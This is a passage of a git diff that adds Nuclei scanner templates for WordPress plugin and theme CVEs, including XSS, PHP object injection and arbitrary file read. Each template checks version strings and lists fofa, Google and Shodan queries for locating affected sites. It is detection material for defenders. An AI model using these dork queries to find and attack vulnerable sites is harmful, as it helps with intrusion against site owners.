+ +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/page-builder-add/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "page-builder-add" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.5.2.0') \ No newline at end of file diff --git a/poc/cve/CVE-2024-43346.yaml b/poc/cve/CVE-2024-43346.yaml new file mode 100644 index 0000000000..f693eff89b --- /dev/null +++ b/poc/cve/CVE-2024-43346.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-43346 + +info: + name: > + Modal Window <= 6.0.3 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Modal Window plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 6.0.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/7790777d-9421-48c6-b789-f1feab109ec7?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-43346 + metadata: + fofa-query: "wp-content/plugins/modal-window/" + google-query: inurl:"/wp-content/plugins/modal-window/" + shodan-query: 'vuln:CVE-2024-43346' + tags: cve,wordpress,wp-plugin,modal-window,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/modal-window/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "modal-window" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 6.0.3') \ No newline at end of file diff --git a/poc/cve/CVE-2024-43348.yaml b/poc/cve/CVE-2024-43348.yaml new file mode 100644 index 0000000000..4793f7c08d --- /dev/null +++ b/poc/cve/CVE-2024-43348.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-43348 + +info: + name: > + Purity Of Soul <= 1.9 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + The Purity Of Soul theme for WordPress is vulnerable to Reflected Cross-Site Scripting in all versions up to, and including, 1.9 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/53d2f416-4b0f-49b7-af14-fbb225aac34d?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-43348 + metadata: + fofa-query: "wp-content/themes/purity-of-soul/" + google-query: inurl:"/wp-content/themes/purity-of-soul/" + shodan-query: 'vuln:CVE-2024-43348' + tags: cve,wordpress,wp-theme,purity-of-soul,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/themes/purity-of-soul/style.css" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Version: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Version: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "purity-of-soul" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.9') \ No newline at end of file diff --git a/poc/cve/CVE-2024-43350.yaml b/poc/cve/CVE-2024-43350.yaml new file mode 100644 index 0000000000..fc208f7c3e --- /dev/null +++ b/poc/cve/CVE-2024-43350.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-43350 + +info: + name: > + Propovoice CRM <= 1.7.6.4 - Unauthenticated Insecure Direct Object Reference + author: topscoder + severity: medium + description: > + The Propovoice: All-in-One Client Management System plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 1.7.6.4 due to missing validation on a user controlled key. This makes it possible for unauthenticated attackers to perform an unauthorized action. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/25acd3d9-0c1a-426e-b670-b842f031bdc5?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N + cvss-score: 5.3 + cve-id: CVE-2024-43350 + metadata: + fofa-query: "wp-content/plugins/propovoice/" + google-query: inurl:"/wp-content/plugins/propovoice/" + shodan-query: 'vuln:CVE-2024-43350' + tags: cve,wordpress,wp-plugin,propovoice,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/propovoice/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "propovoice" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.7.6.4') \ No newline at end of file diff --git a/poc/cve/CVE-2024-43352.yaml b/poc/cve/CVE-2024-43352.yaml new file mode 100644 index 0000000000..bbc7d30db6 --- /dev/null +++ b/poc/cve/CVE-2024-43352.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-43352 + +info: + name: > + GivingPress Lite <= 1.8.6 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The GivingPress Lite theme for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 1.8.6 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/69a14e2f-442e-421c-bf5d-0bff3b822911?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-43352 + metadata: + fofa-query: "wp-content/themes/givingpress-lite/" + google-query: inurl:"/wp-content/themes/givingpress-lite/" + shodan-query: 'vuln:CVE-2024-43352' + tags: cve,wordpress,wp-theme,givingpress-lite,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/themes/givingpress-lite/style.css" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Version: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Version: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "givingpress-lite" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.8.6') \ No newline at end of file diff --git a/poc/cve/CVE-2024-43353.yaml b/poc/cve/CVE-2024-43353.yaml new file mode 100644 index 0000000000..940656b810 --- /dev/null +++ b/poc/cve/CVE-2024-43353.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-43353 + +info: + name: > + myCred <= 2.7.2 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The myCred plugin for WordPress is vulnerable to Stored Cross-Site Scripting via wrapper attribute in versions up to, and including, 2.7.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/69695e2e-2086-4d50-8518-0b2f5ab9ea56?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-43353 + metadata: + fofa-query: "wp-content/plugins/mycred/" + google-query: inurl:"/wp-content/plugins/mycred/" + shodan-query: 'vuln:CVE-2024-43353' + tags: cve,wordpress,wp-plugin,mycred,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/mycred/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "mycred" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.7.2') \ No newline at end of file diff --git a/poc/cve/CVE-2024-43354.yaml b/poc/cve/CVE-2024-43354.yaml new file mode 100644 index 0000000000..c9a9511ae6 --- /dev/null +++ b/poc/cve/CVE-2024-43354.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-43354 + +info: + name: > + myCred <= 2.7.2 - Unauthenticated PHP Object Injection + author: topscoder + severity: critical + description: > + The myCred – Loyalty Points and Rewards plugin for WordPress and WooCommerce – Give Points, Ranks, Badges, Cashback, WooCommerce rewards, and WooCommerce credits for Gamification plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 2.7.2 via deserialization of untrusted input from the 'data' parameter This makes it possible for unauthenticated attackers to inject a PHP Object. No known POP chain is present in the vulnerable software. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/44ea3322-10f6-4f52-8fa8-8cc2632b67ce?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.1 + cve-id: CVE-2024-43354 + metadata: + fofa-query: "wp-content/plugins/mycred/" + google-query: inurl:"/wp-content/plugins/mycred/" + shodan-query: 'vuln:CVE-2024-43354' + tags: cve,wordpress,wp-plugin,mycred,critical + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/mycred/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "mycred" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.7.2') \ No newline at end of file diff --git a/poc/cve/CVE-2024-4359-739b7c6397af07930a602ed827679ba1.yaml b/poc/cve/CVE-2024-4359-739b7c6397af07930a602ed827679ba1.yaml new file mode 100644 index 0000000000..31946ef2f1 --- /dev/null +++ b/poc/cve/CVE-2024-4359-739b7c6397af07930a602ed827679ba1.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-4359-739b7c6397af07930a602ed827679ba1 + +info: + name: > + Element Pack Elementor Addons (Header Footer, Template Library, Dynamic Grid & Carousel, Remote Arrows) <= 5.7.2 - Authenticated (Contributor+) Arbitrary File Read + author: topscoder + severity: low + description: > + The Element Pack Elementor Addons (Header Footer, Template Library, Dynamic Grid & Carousel, Remote Arrows) plugin for WordPress is vulnerable to arbitrary file reads in all versions up to, and including, 5.7.2 via the SVG widget and a lack of sufficient file validation in the render_svg function. This makes it possible for authenticated attackers, with contributor-level access and above, to read the contents of arbitrary files on the server, which can contain sensitive information. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/a55cfeb3-7632-4a88-ac71-8e119b060721?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N + cvss-score: 6.5 + cve-id: CVE-2024-4359 + metadata: + fofa-query: "wp-content/plugins/bdthemes-element-pack-lite/" + google-query: inurl:"/wp-content/plugins/bdthemes-element-pack-lite/" + shodan-query: 'vuln:CVE-2024-4359' + tags: cve,wordpress,wp-plugin,bdthemes-element-pack-lite,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/bdthemes-element-pack-lite/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "bdthemes-element-pack-lite" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 5.7.2') \ No newline at end of file diff --git a/poc/cve/CVE-2024-5502.yaml b/poc/cve/CVE-2024-5502.yaml new file mode 100644 index 0000000000..4bcc03a886 --- /dev/null +++ b/poc/cve/CVE-2024-5502.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-5502 + +info: + name: > + Piotnet Addons For Elementor <= 2.4.30 - Authenticated (Contributor+) Stored Cross-Site Scripting via Multiple Widgets + author: topscoder + severity: low + description: > + The Piotnet Addons For Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Image Accordion, Dual Heading, and Vertical Timeline widgets in all versions up to, and including, 2.4.30 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/921616e4-2b66-4847-869a-90c1c459685f?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-5502 + metadata: + fofa-query: "wp-content/plugins/piotnet-addons-for-elementor/" + google-query: inurl:"/wp-content/plugins/piotnet-addons-for-elementor/" + shodan-query: 'vuln:CVE-2024-5502' + tags: cve,wordpress,wp-plugin,piotnet-addons-for-elementor,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/piotnet-addons-for-elementor/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "piotnet-addons-for-elementor" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.4.30') \ No newline at end of file diff --git a/poc/cve/CVE-2024-6493-8ce30d589b40d67eb51efe70935d8bd9.yaml b/poc/cve/CVE-2024-6493-8ce30d589b40d67eb51efe70935d8bd9.yaml new file mode 100644 index 0000000000..40aea3b702 --- /dev/null +++ b/poc/cve/CVE-2024-6493-8ce30d589b40d67eb51efe70935d8bd9.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-6493-8ce30d589b40d67eb51efe70935d8bd9 + +info: + name: > + NinjaTeam Header Footer Custom Code < 1.2 - Authenticated (Admin+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The NinjaTeam Header Footer Custom Code plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 1.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/3256da87-0d37-4c8f-9bac-95e3017e35d5?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N + cvss-score: 4.4 + cve-id: CVE-2024-6493 + metadata: + fofa-query: "wp-content/plugins/header-footer-code/" + google-query: inurl:"/wp-content/plugins/header-footer-code/" + shodan-query: 'vuln:CVE-2024-6493' + tags: cve,wordpress,wp-plugin,header-footer-code,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/header-footer-code/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "header-footer-code" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.1') \ No newline at end of file diff --git a/poc/cve/CVE-2024-6499-506582290ab27969bbad70e6796d3810.yaml b/poc/cve/CVE-2024-6499-506582290ab27969bbad70e6796d3810.yaml new file mode 100644 index 0000000000..a3dad1bfd0 --- /dev/null +++ b/poc/cve/CVE-2024-6499-506582290ab27969bbad70e6796d3810.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-6499-506582290ab27969bbad70e6796d3810 + +info: + name: > + WordPress Button Plugin MaxButtons <= 9.7.8 - Full Path Disclosure + author: topscoder + severity: medium + description: > + The WordPress Button Plugin MaxButtons plugin for WordPress is vulnerable to information exposure in all versions up to, and including, 9.7.8. This makes it possible for unauthenticated attackers to obtain the full path to instances, which they may be able to use in combination with other vulnerabilities or to simplify reconnaissance work. On its own, this information is of very limited use. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/fdd0694c-ea7e-4cf8-a8d8-82a2b02fecdf?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cve-id: CVE-2024-6499 + metadata: + fofa-query: "wp-content/plugins/maxbuttons/" + google-query: inurl:"/wp-content/plugins/maxbuttons/" + shodan-query: 'vuln:CVE-2024-6499' + tags: cve,wordpress,wp-plugin,maxbuttons,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/maxbuttons/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "maxbuttons" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 9.7.8') \ No newline at end of file diff --git a/poc/cve/CVE-2024-6617-861b78cb0bd74ebded540a2ef2369b65.yaml b/poc/cve/CVE-2024-6617-861b78cb0bd74ebded540a2ef2369b65.yaml new file mode 100644 index 0000000000..c5c1018556 --- /dev/null +++ b/poc/cve/CVE-2024-6617-861b78cb0bd74ebded540a2ef2369b65.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-6617-861b78cb0bd74ebded540a2ef2369b65 + +info: + name: > + NinjaTeam Header Footer Custom Code < 1.2 - Authenticated (Admin+) Stored Cross-Site Scripting via CSS Styles + author: topscoder + severity: low + description: > + The NinjaTeam Header Footer Custom Code plugin for WordPress is vulnerable to Stored Cross-Site Scripting via CSS styles in all versions up to, and including, 1.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/521af15c-983c-49dc-a90b-b090281db78a?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N + cvss-score: 4.4 + cve-id: CVE-2024-6617 + metadata: + fofa-query: "wp-content/plugins/header-footer-code/" + google-query: inurl:"/wp-content/plugins/header-footer-code/" + shodan-query: 'vuln:CVE-2024-6617' + tags: cve,wordpress,wp-plugin,header-footer-code,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/header-footer-code/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "header-footer-code" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.1') \ No newline at end of file diff --git a/poc/cve/CVE-2024-6631-b90f42cd5d41e04b09c0aa755df89cc7.yaml b/poc/cve/CVE-2024-6631-b90f42cd5d41e04b09c0aa755df89cc7.yaml new file mode 100644 index 0000000000..27ad15b265 --- /dev/null +++ b/poc/cve/CVE-2024-6631-b90f42cd5d41e04b09c0aa755df89cc7.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-6631-b90f42cd5d41e04b09c0aa755df89cc7 + +info: + name: > + ImageRecycle pdf & image compression <= 3.1.14 - Missing Authorization in Several AJAX Actions + author: topscoder + severity: low + description: > + The ImageRecycle pdf & image compression plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on several AJAX actions in all versions up to, and including, 3.1.14. This makes it possible for authenticated attackers, with Subscriber-level access and above, to perform unauthorized actions, such as updating plugin settings. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/f330bf36-0a39-40d6-a075-c87fdb9dc2da?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:L/A:N + cvss-score: 5 + cve-id: CVE-2024-6631 + metadata: + fofa-query: "wp-content/plugins/imagerecycle-pdf-image-compression/" + google-query: inurl:"/wp-content/plugins/imagerecycle-pdf-image-compression/" + shodan-query: 'vuln:CVE-2024-6631' + tags: cve,wordpress,wp-plugin,imagerecycle-pdf-image-compression,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/imagerecycle-pdf-image-compression/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "imagerecycle-pdf-image-compression" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.1.14') \ No newline at end of file diff --git a/poc/cve/CVE-2024-6665-8c1223ca753362f23c9223b5d83c7625.yaml b/poc/cve/CVE-2024-6665-8c1223ca753362f23c9223b5d83c7625.yaml new file mode 100644 index 0000000000..6655caeaf8 --- /dev/null +++ b/poc/cve/CVE-2024-6665-8c1223ca753362f23c9223b5d83c7625.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-6665-8c1223ca753362f23c9223b5d83c7625 + +info: + name: > + KBucket: Your Curated Content in WordPress <= 4.1.5 - Authenticated (Admin+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The KBucket: Your Curated Content in WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'yt_apikey' parameter in all versions up to, and including, 4.1.5 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/2ff5094a-8cf2-4c18-921d-7ec31d60c13a?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N + cvss-score: 4.4 + cve-id: CVE-2024-6665 + metadata: + fofa-query: "wp-content/plugins/kbucket/" + google-query: inurl:"/wp-content/plugins/kbucket/" + shodan-query: 'vuln:CVE-2024-6665' + tags: cve,wordpress,wp-plugin,kbucket,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/kbucket/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "kbucket" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 4.1.5') \ No newline at end of file diff --git a/poc/cve/CVE-2024-6667-4b06082c59fafdba7199d79388d0eff6.yaml b/poc/cve/CVE-2024-6667-4b06082c59fafdba7199d79388d0eff6.yaml new file mode 100644 index 0000000000..55ddf96859 --- /dev/null +++ b/poc/cve/CVE-2024-6667-4b06082c59fafdba7199d79388d0eff6.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-6667-4b06082c59fafdba7199d79388d0eff6 + +info: + name: > + KBucket: Your Curated Content in WordPress <= 4.1.4 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + The KBucket: Your Curated Content in WordPress plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via $_SERVER['REQUEST_URI'] in all versions up to, and including, 4.1.4 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/b37087a4-83b2-4355-89f0-6ff0aa8d0013?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-6667 + metadata: + fofa-query: "wp-content/plugins/kbucket/" + google-query: inurl:"/wp-content/plugins/kbucket/" + shodan-query: 'vuln:CVE-2024-6667' + tags: cve,wordpress,wp-plugin,kbucket,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/kbucket/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "kbucket" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 4.1.4') \ No newline at end of file diff --git a/poc/cve/CVE-2024-7258.yaml b/poc/cve/CVE-2024-7258.yaml new file mode 100644 index 0000000000..11886ed40b --- /dev/null +++ b/poc/cve/CVE-2024-7258.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-7258 + +info: + name: > + WooCommerce Google Feed Manager <= 2.8.0 - Missing Authorization to Authenticated (Contributor+) Arbitrary Feed Actions + author: topscoder + severity: low + description: > + The WooCommerce Google Feed Manager plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on several functions in all versions up to, and including, 2.8.0. This makes it possible for authenticated attackers, with Contributor-level access and above, to perform various feed actions, such as deleting a feed, duplicating a feed, and changing the status of a feed. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/6b8fac8f-619a-442e-8b8f-43a0c0a44b07?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N + cvss-score: 4.3 + cve-id: CVE-2024-7258 + metadata: + fofa-query: "wp-content/plugins/wp-product-feed-manager/" + google-query: inurl:"/wp-content/plugins/wp-product-feed-manager/" + shodan-query: 'vuln:CVE-2024-7258' + tags: cve,wordpress,wp-plugin,wp-product-feed-manager,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wp-product-feed-manager/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-product-feed-manager" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.8.0') \ No newline at end of file diff --git a/poc/cve/CVE-2024-7351-93a2178394f4d78fbcc5b86f7c46b250.yaml b/poc/cve/CVE-2024-7351-93a2178394f4d78fbcc5b86f7c46b250.yaml new file mode 100644 index 0000000000..85d0bb2865 --- /dev/null +++ b/poc/cve/CVE-2024-7351-93a2178394f4d78fbcc5b86f7c46b250.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-7351-93a2178394f4d78fbcc5b86f7c46b250 + +info: + name: > + Simple Job Board <= 2.12.3 - Authenticated (Editor+) PHP Object Injection + author: topscoder + severity: low + description: > + The Simple Job Board plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 2.12.3 via deserialization of untrusted input when editing job applications. This makes it possible for authenticated attackers, with Editor-level access and above, to inject a PHP Object. No known POP chain is present in the vulnerable software. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/ba6312b9-1b66-4b4f-a78d-515fa4aab63b?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H + cvss-score: 